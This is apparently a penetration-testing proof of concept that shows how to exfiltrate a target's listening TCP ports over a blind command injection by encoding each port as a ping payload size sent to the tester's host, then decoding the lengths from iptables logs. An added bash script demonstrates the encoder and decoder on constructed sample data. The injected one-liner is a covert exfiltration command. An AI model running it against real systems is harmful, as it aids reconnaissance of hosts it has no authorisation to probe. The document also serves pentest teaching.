Listener discovery using ping PoC

This is a nice example of using ordinary programs and commands in an unusual way. The PoC can be used to discover listening TCP ports on a remote host when we are able to send it a blind command (one whose output we never see) but have no idea whether, or how, TCP traffic is controlled in the remote environment. The scripts encode each port number in the length of the ICMP echo request sent by the ping command: ping -s N sends N bytes of ICMP payload, so the packet arrives with an IP total length of N + 28 (20-byte IPv4 header plus 8-byte ICMP header), and that length is what we read back from the firewall log. A little pipelining normalizes the strings that are sent and captured. In the following case two Linux machines are used.

On the local PC I start a logging process:

iptables -I INPUT -p ICMP -j LOG

On the host under test, for example through a blind command injection (netstat -lnt lists the listening TCP sockets; sed strips everything up to the last colon, so IPv6 wildcard addresses such as :::22 are handled as well as 0.0.0.0:22; the -p flag of the original is not needed because only the address column is used):

netstat -lnt | grep LISTEN | awk '{print $4}' | sed 's/.*://' | sort -n -u | while read line; do ping -c 1 -s $line <remote_PC>; done

Again on the local PC I collect and normalize the log (where the kernel log lands depends on the syslog configuration: /var/log/messages, /var/log/kern.log or journalctl -k). Only echo requests (TYPE=8) are kept, because the -p ICMP rule also logs echo replies and ICMP error messages, and an error message carries a second, embedded LEN= field that would otherwise be misread as a port:

grep 'PROTO=ICMP TYPE=8' /var/log/messages | grep -o 'LEN=[0-9]*' | cut -d= -f2 | sort -n -u | while read line; do PORT=$(($line-28)) && echo Open Port = $PORT; done

Two limits to keep in mind. The largest payload Linux ping accepts is 65507 bytes, so ports above that cannot be encoded with a single -s value. Ports above 1472 produce packets larger than a 1500-byte Ethernet MTU and are fragmented on the wire; a Linux receiver with connection tracking loaded reassembles them before the INPUT chain and logs the full length, but if the log shows one 1500-byte entry plus a short remainder instead, the port is the sum of the fragment payloads, not either LEN value minus 28. If other hosts may ping the local PC during the test, also filter on SRC=<PC_to_test>.
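Putting both halves together as an offline script, as an added example that is not the author's one-liners: constructed netstat output and constructed iptables LOG lines stand in for the two hosts, the sender side prints the ping commands rather than executing them, and the receiver side decodes the log while ignoring the echo replies and ICMP errors that a blanket -p ICMP rule also captures. The host addresses and log lines are invented for the demo.

```shell
#!/bin/bash
# Added example (not from the original post): encoder and decoder for the
# ping-length covert channel. All input below is constructed sample data.

# IPv4 header (20) + ICMP header (8): the LOG target's LEN= is the IP total length.
HDR_OVERHEAD=28
# Largest -s payload Linux ping accepts (65535 - 28); bigger ports cannot be encoded.
MAX_PAYLOAD=65507
# Payloads above this exceed a 1500-byte Ethernet MTU and fragment on the wire.
FRAG_THRESHOLD=1472

# Constructed `netstat -lnt` output from the host under test (sshd on v4 and v6).
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN'

# Constructed kernel log written by `iptables -I INPUT -p ICMP -j LOG` on the local PC.
# Includes a duplicate request, an unrelated echo reply (TYPE=0) and a port-unreachable
# error (TYPE=3) whose bracketed inner header carries its own LEN= fields.
SAMPLE_LOG='Mar  3 12:00:01 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.5 DST=10.0.0.1 LEN=50 TOS=0x00 PREC=0x00 TTL=64 ID=1001 DF PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Mar  3 12:00:02 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.5 DST=10.0.0.1 LEN=108 TOS=0x00 PREC=0x00 TTL=64 ID=1002 DF PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Mar  3 12:00:03 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.5 DST=10.0.0.1 LEN=3334 TOS=0x00 PREC=0x00 TTL=64 ID=1003 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Mar  3 12:00:03 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.5 DST=10.0.0.1 LEN=108 TOS=0x00 PREC=0x00 TTL=64 ID=1004 DF PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Mar  3 12:00:04 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.9 DST=10.0.0.1 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=1005 PROTO=ICMP TYPE=0 CODE=0 ID=3 SEQ=1
Mar  3 12:00:05 lab kernel: IN=eth0 OUT= MAC=52:54:00:aa:bb:cc:52:54:00:11:22:33:08:00 SRC=10.0.0.5 DST=10.0.0.1 LEN=56 TOS=0x00 PREC=0x00 TTL=64 ID=1006 PROTO=ICMP TYPE=3 CODE=3 [SRC=10.0.0.1 DST=10.0.0.5 LEN=28 TOS=0x00 PREC=0x00 TTL=64 ID=9 PROTO=UDP SPT=40000 DPT=53 LEN=8 ]'

# Sender: netstat text on stdin -> sorted unique listening ports. Taking the text after
# the LAST colon handles "0.0.0.0:22", "127.0.0.1:3306" and ":::80" alike, which
# `cut -d: -f2` does not (it yields an empty field for the IPv6 wildcard).
listening_ports() {
    awk '$6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' | sort -n -u
}

# Sender: ports on stdin -> one ping command per port, printed so the demo runs offline.
# Ports that do not fit a single ICMP payload are reported on stderr and skipped.
encode_ports() {
    local target="$1" port
    while read -r port; do
        [ -n "$port" ] || continue
        if [ "$port" -gt "$MAX_PAYLOAD" ]; then
            echo "port $port exceeds the maximum ICMP payload, cannot encode" >&2
            continue
        fi
        echo "ping -c 1 -s $port $target"
    done
}

# Receiver: log lines on stdin -> "Open Port = N" per distinct echo request from $1.
# The SRC= and TYPE=8 filters drop other hosts' traffic, echo replies and ICMP errors
# (whose embedded LEN= would otherwise be decoded as a bogus port).
decode_ports() {
    local src="$1"
    grep "SRC=$src " | grep 'PROTO=ICMP TYPE=8 ' | grep -o 'LEN=[0-9]*' | cut -d= -f2 \
      | sort -n -u | awk -v o="$HDR_OVERHEAD" -v f="$FRAG_THRESHOLD" '{
            port = $1 - o
            note = (port > f) ? " (payload larger than Ethernet MTU: confirm the log shows the reassembled length)" : ""
            print "Open Port = " port note
        }'
}

# Demo on the constructed samples; feed real netstat output / the real log in practice.
printf '%s\n' "$SAMPLE_NETSTAT" | listening_ports | encode_ports 10.0.0.1
printf '%s\n' "$SAMPLE_LOG" | decode_ports 10.0.0.5
```

The decoder flags port 3306 because a 3334-byte IP packet can only have reached the INPUT chain intact if the receiver reassembled the fragments; on a host without connection tracking the log would instead show the individual fragment lengths, and the sum of their payloads, not LEN minus 28, is the port.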

I based this Proof of Concept on the article “Blind Command Line Injection” from PenTest Magazine by Mr. Chris Duffy: thank you.
